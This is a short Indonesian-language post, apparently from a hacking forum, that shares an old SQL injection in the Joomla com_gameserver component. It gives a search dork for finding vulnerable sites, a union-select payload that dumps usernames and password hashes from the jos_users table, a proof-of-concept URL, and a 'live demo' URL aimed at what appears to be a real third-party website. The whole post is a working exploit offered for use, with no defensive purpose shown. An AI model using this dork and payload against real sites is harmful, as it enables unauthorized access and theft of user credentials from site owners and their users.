Mau Share sedikit ni Bug Joomla yang lama tapi sampe sekarang masih banyak yang berkeliaran hehehe

dork :
:
inurl:"com_gameserver"

exploit :
:
999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/
**/from/**/jos_users--

Sqli ( poc ) :
:
http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/
**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

live demo :
:
http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/
**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--